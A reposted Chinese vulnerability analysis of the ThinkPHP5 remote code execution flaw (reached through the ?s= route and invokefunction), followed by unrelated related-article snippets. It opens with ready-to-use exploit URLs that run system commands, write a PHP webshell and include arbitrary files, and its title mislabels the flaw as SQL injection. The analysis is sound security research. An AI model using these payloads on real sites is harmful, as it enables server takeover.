ThinkPHP5漏洞分析之SQL注入(七)

news2024/11/24 20:10:08

说明

该文章来源于同事lu2ker转载至此处,更多文章可参考:https://github.com/lu2ker/

文章目录

    • 说明
    • 0x00 从?s=是个啥开始
    • 0x01 模型/控制器/方法的处理
    • 0x02 漏洞原因
    • 0x03 参数的获取?

参考链接:Mochazz/ThinkPHP-Vuln/

影响版本:5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30

测试环境:PHP7.3.4、Mysql5.7.26、TP5.0.18

5.1.x

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.0.x

?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg    # 包含任意文件
?s=index/\think\Config/load&file=../../t.php     # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

本文以?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

为例。

相信很多人在不懂原理的情况下,看这一串payload是感觉很nb的一个paylaod(因为它长,需要的参数多),像我本人之前就纳闷这payload中为啥还会有反斜杠,s参数名是啥?invokefunction是啥?这个think\app是个啥东西呀为啥为啥。可是当时只看得懂system(whoami)😂。接下来就从代码中找到这些答案。

只想看结果请直接跳到:

0x00 从?s=是个啥开始

在application\config.php#78行,有一个var_pathinfo键的值默认就是s,而该项的注释是PATHINFO变量名 用于兼容模式。那么什么是PATHINFO?什么是兼容模式?

在源码中遇到不知道的定义,大可以全局搜索它在哪里定义,哪里用到了它:

在这里插入图片描述

来到thinkphp\library\think\Request.php#pathinfo()来阅读var_pathinfo的使用。
在这里插入图片描述

可以看到在390行用Config::get获取了var_pathinfo的值,也就是s,然后就变成了`` G E T [ s ] ‘ ,获取到值赋值给 ‘ _GET[s]`,获取到值赋值给` GET[s],获取到值赋值给_SERVER[‘PATH_INFO’],然后下面407行去除了最左边的正斜杠。那么现在就明白了。s就是用来获取payload中的index/\think\app/invokefunction`这部分的,它也叫做兼容模式参数,而它的值在tp里面就作为pathinfo。pathinfo后来又会怎么处理呢?继续跟着程序执行流程

在thinkphp\library\think\Route.php#check()

在这里插入图片描述

其中,$url实际上传入的就是刚才的pathinfo的值。注意到839行把所有的/都替换为了|。那么现在就是

index|\think\app|invokefunction这个样子。但是因为没有定义好的路由规则,最后还是return了false。在thinkphp\library\think\App.php#642:

在这里插入图片描述

可以看到,如果没有定义好路由规则,也就是刚才的return了false,并且还有强制路由的话就会抛出错误。但是这个漏洞利用条件之一就是不开启强制路由~。

那么再往下走,就会到thinkphp\library\think\Route.php#parseUrl来解析那个pathinfo。我想这应该就是所谓的兼容模式了。

0x01 模型/控制器/方法的处理

在parseUrl方法中也会把正斜杠替换为|来处理index/\think\app/invokefunction(为了方便下面以url替换这串)

但是与之前的check方法不同的是,它紧接着调用了parseUrlPath()方法。

在这里插入图片描述

在parseUrlPath()方法中,用$path = explode('/', $url);来把这个url给处理为了一个数组。:

在这里插入图片描述

这样实际上就是分成了模型、控制器、方法了。最终逐个获取的位置是parseUrl方法的:

在这里插入图片描述

0x02 漏洞原因

当程序执行到thinkphp\library\think\App.php#exec(),会进入到module分支,来到module方法,在:

在这里插入图片描述

这里的 r e s u l t 数组实际上就是刚才 p a r s e U r l 返回的那个“ result数组实际上就是刚才parseUrl返回的那个“ result数组实际上就是刚才parseUrl返回的那个path数组”,

在这里插入图片描述

1=>控制器,2=>操作名(也叫做方法名)。在这里获取了之后,程序没有再对控制器、方法名过滤导致了任意控制器下任意方法的调用。(但实际上并不是很任意。。)

紧接着就会使用加载器

$instance = Loader::controller(
                $controller,
                $config['url_controller_layer'],
                $config['controller_suffix'],
                $config['empty_controller']
            );

加载\think\app了,在thinkphp\library\think\Loader.php#controller

在这里插入图片描述

然后在invokeClass方法中:

在这里插入图片描述

使用反射来获取了think\App的一个指针?句柄?反正$reflect现在已经代表这个类了。 。。然后用:

在这里插入图片描述

来实例化。,返回到了$instance变量中,这时控制器这块已经基本上处理完了,think\App实际上就是thinkphp\library\think\App.php这个php文件里的App类(在MVC架构中,某些类也是可以叫做控制器),think是一个命名空间。意思就是think命名空间下的都是thinkphp的核心代码。命名空间的概念百度一下就知道了。

接下来就是获取方法,调用反射执行类的方法。App类里的invokefunction方法如下:

    /**
     * 执行函数或者闭包方法 支持参数调用
     * @access public
     * @param string|array|\Closure $function 函数或者闭包
     * @param array                 $vars     变量
     * @return mixed
     */
    public static function invokeFunction($function, $vars = [])
    {
        $reflect = new \ReflectionFunction($function);
        $args    = self::bindParams($reflect, $vars);
        // 记录执行信息
        self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');

        return $reflect->invokeArgs($args);
    }

最后return的时候调用了invokeArgs,在手册中解释如下:

在这里插入图片描述

很明确它是能调用带参函数的。

总体流程如下:使用反射执行了App里的invokeFunction,并给其传入了参数1:function=call_user_func_array,参数2:vars[]=system&vars[1][]=whoami

它会执行call_user_func_array('system', ['whoami']),也就是system(‘whoami’)。执行了命令。

0x03 参数的获取?

使用的是bindParams方法获取的参数,参数名必须还得是这特定值,为啥呢?

因为bindParams方法中会用getParameters(ReflectionFunctionAbstract::getParameters)获取反射对象的每一个参数,返回参数列表。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/144123.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

ThinkPHP5之文件包含审计分析(六)

说明 该文章来源于同事lu2ker转载至此处&#xff0c;更多文章可参考&#xff1a;https://github.com/lu2ker/ 文章目录说明method方法调用链&#xff1a;程序启动时&#xff1a;后门技巧利用method的任意方法调用&#xff0c;调用构造函数__construct&#xff0c;且调用时会传…

同盾科技 x TiDB丨实时数据架构为风控智能决策保驾护航

同盾科技是中国领先的人工智能科技企业。为了确保服务的低延迟和高可用性&#xff0c;同盾的技术团队不断寻找最佳的技术架构。经过长时间调研&#xff0c;他们最终选择了新一代分布式数据库 TiDB 作为离线层的核心数据库&#xff0c;基于 TiDB 打造的实时数据架构为风控智能决…

Java中常用API总结(3)—— Runtime类(含实例解读)

Runtime类一、前言二、概述1.API帮助文档2.概述三、常用方法1.获取当前系统的运行环境对象1️⃣格式2️⃣实例2.获取CPU总线程数1️⃣格式2️⃣实例3.能够获取总内存大小(单位byte)1️⃣格式2️⃣实例4.已经从系统中获取总内存大小(单位byte)1️⃣格式2️⃣实例5.剩余内存大小1…

【开源项目】Sa-Token快速登录(使用+源码解析)

什么是Sa-Token 官网&#xff1a;https://sa-token.dev33.cn Sa-Token 是一个轻量级 Java 权限认证框架&#xff0c;主要解决&#xff1a;登录认证、权限认证、Session会话、单点登录、OAuth2.0、微服务网关鉴权 等一系列权限相关问题。 快速使用 引入Maven依赖 <!-- w…

有奖征集丨大数据/人工智能模型开发征集

大数据人工智能模型开发征集 为助力构建创新型人才培养模式&#xff0c;培养具有创新精神和实践能力的高素质智能技术人才&#xff0c;激发学生积极参与数据科学研究、技术开发、数据学科竞赛等各类社会实践活动的创新热情。依托模型交易平台&#xff0c;为学生提供自主学习…

认识Linux系统结构

Linux 系统一般有 4 个主要部分&#xff1a;内核、shell、文件系统和应用程序。内核、shell 和文件系统一起形成了基本的操作系统结构&#xff0c;它们使得用户可以运行程序、管理文件并使用系统。 Linux内核 内核是操作系统的核心&#xff0c;具有很多最基本功能&#xff0c;…

linux系统中进一步理解设备树

第一&#xff1a;前言 大家好&#xff0c;我是ST。 目录 第一&#xff1a;前言 第二&#xff1a;框图 第三&#xff1a;体验设备树 第四&#xff1a;实验过程分析 第五&#xff1a;实验代码 1、应用程序ledtest.c&#xff1a; 2、驱动层leddrv.c 3、硬件层&#xff1a…

不忘初心,坚持创作和分享,做自己喜欢的事 - 2022 年回顾

不知不觉&#xff0c;来到 Elastic 已经三年多了。在 Elastic 的三年&#xff0c;是疫情发生的三年。对很多人来说&#xff0c;疫情对我们的工作和学习都有很大的变化。好在我还能静下心来&#xff0c;每天坚持学习&#xff0c;不断地创作。记录下来自己的学习及成长经历。我学…

苹果电脑数据回复Aiseesoft Data Recovery

苹果电脑照片误删了怎么找回&#xff0c;数据丢失怎么办&#xff1f;Aiseesoft Data Recovery是专业数据恢复软件&#xff0c;能够帮助你恢复几乎所有删除/丢失的文件&#xff0c;如照片&#xff0c;文件&#xff0c;电子邮件&#xff0c;音频&#xff0c;视频且支持从计算机&a…

C语言深度剖析指针

文章目录 一、指针简单介绍 二、进阶指针的详解 2、1 字符指针 2、2 指针数组 2、3 数组指针 2、3、1 数组指针的定义以用法 2、3、2 数组名和&数组名的区别 2、3、3 数组指针的用法 2、4 函数指针 2、4、1 函数指针的解释 2、4、2 函数指针的举例分析 2、5 函数指针数组 2…

Python 图片转换(Image Conversion) (JPG ⇄ PNG/JPG ⇄ WEBP)

这里我们将使用 PIL&#xff08;Python Imaging Library&#xff09;或 pillow 库&#xff0c;它在 Python 中广泛用于图像处理&#xff0c;Python Imaging Library 中最重要的类是在Image同名模块中定义的类。您可以通过多种方式创建此类的实例&#xff1b;通过从文件加载图像…

高通开发系列 - usb和adb服务启动流程

By: fulinux E-mail: fulinux@sina.com Blog: https://blog.csdn.net/fulinus 喜欢的盆友欢迎点赞和订阅! 你的喜欢就是我写作的动力! 目录 初始化usb相关服务启动adbd服务adbd服务adb devices -l命令串口号丢失问题初始化usb相关服务 /lib/systemd/system/usb.service /etc…

基于yolov5-v7.0开发构建裸土实例分割检测识别模型

yolov5在v7.0的版本中加入了对图像实例分割的全面支持&#xff0c;这里主要就是想基于v7.0的分支来开发构建裸土分割模型&#xff0c;其实在实际计算的时候模型是可以连带着检测任务一起输出结果的&#xff0c;这里我从结果形式上面直观来看应该就是在推理阶段直接基于分割的结…

回顾2022年的历程,展望2023年目标

这里写目录标题回顾2022年博客之星你参加了吗&#xff1f;学习方面写博客方面在涨粉丝方面展望2023回顾2022年 时间如梭&#xff0c;转眼间已经2023年了。 你开始做总结了吗&#xff1f; 博客之星你参加了吗&#xff1f; 这是 2022 博客之星 的竞选帖子&#xff0c; 请你在这…

中国电信分布式物联网操作系统CTWing OS 2.0发布!

近日&#xff0c;2022天翼数字科技生态大会云上隆重开幕&#xff0c;由中国电信天翼物联自主研发的分布式物联网操作系统CTWing OS 2.0最新成果正式发布。CTWing OS 2.0在体系架构、系统功能、系统性能、稳定保障、安全可信、行业赋能六大要素上实现全面提升&#xff0c;全方位…

SQLSERVER 的复合索引和包含索引到底有啥区别?

一&#xff1a;背景 1. 讲故事 在 SQLSERVER 中有非常多的索引&#xff0c;比如&#xff1a;聚集索引&#xff0c;非聚集索引&#xff0c;唯一索引&#xff0c;复合索引&#xff0c;Include索引&#xff0c;交叉索引&#xff0c;连接索引&#xff0c;奇葩索引等等&#xff0c…

首发ML-30s+,一径打响CES激光雷达大战第一枪

作者 | 王博 编辑 | 于婷2023年1月&#xff0c;CES再度在美国拉斯维加斯拉开帷幕。随着车企在车载软硬件上不断加大投入&#xff0c;CES也越发变得像一个高规格的全球车展。 根据研究机构Counterpoint的测算&#xff0c;由于高阶ADAS和Robotaxi普及&#xff0c;到2030年全球激光…

Spring Cloud Netflix 全套组件入门到实战

文章目录简介注册中心核心功能高可用配置服务调用RestTemplateRestTemplateRibbonFegin负载策略超时&重试服务熔断降级机制隔离机制线程池隔离信号量隔离Hystrix仪表板服务路由启用Zuul路由配置参考文档代码仓库通过本文可以给你带来什么&#xff1f;熟悉掌握Spring Cloud&…

关于OPCUA的配套规范

OPC UA中的信息建模能力足够强大&#xff0c;使OPC UA成为定义从简单的数据&#xff08;如工程单位和传感器或设备生成的最大/最小范围&#xff09;到大型复杂关系的理想选择&#xff0c;其中包括涉及数据结构&#xff0c;方法和状态机的复杂对象类型的实例化。也就是说&#x…

mysql数据库的基础操作(一)

一、导入/导出sql脚本 1.1 导入sql脚本 1.1.1 终端导入sql脚本 在mysql中&#xff0c;执行source命令 mysql> source /chenshuai/cs.sql 1.1.2 可视化工具导入sql脚本 在Navicat Premium中&#xff0c;右键这个数据库&#xff0c;然后Execute SQL File 1.2 导出sql脚本…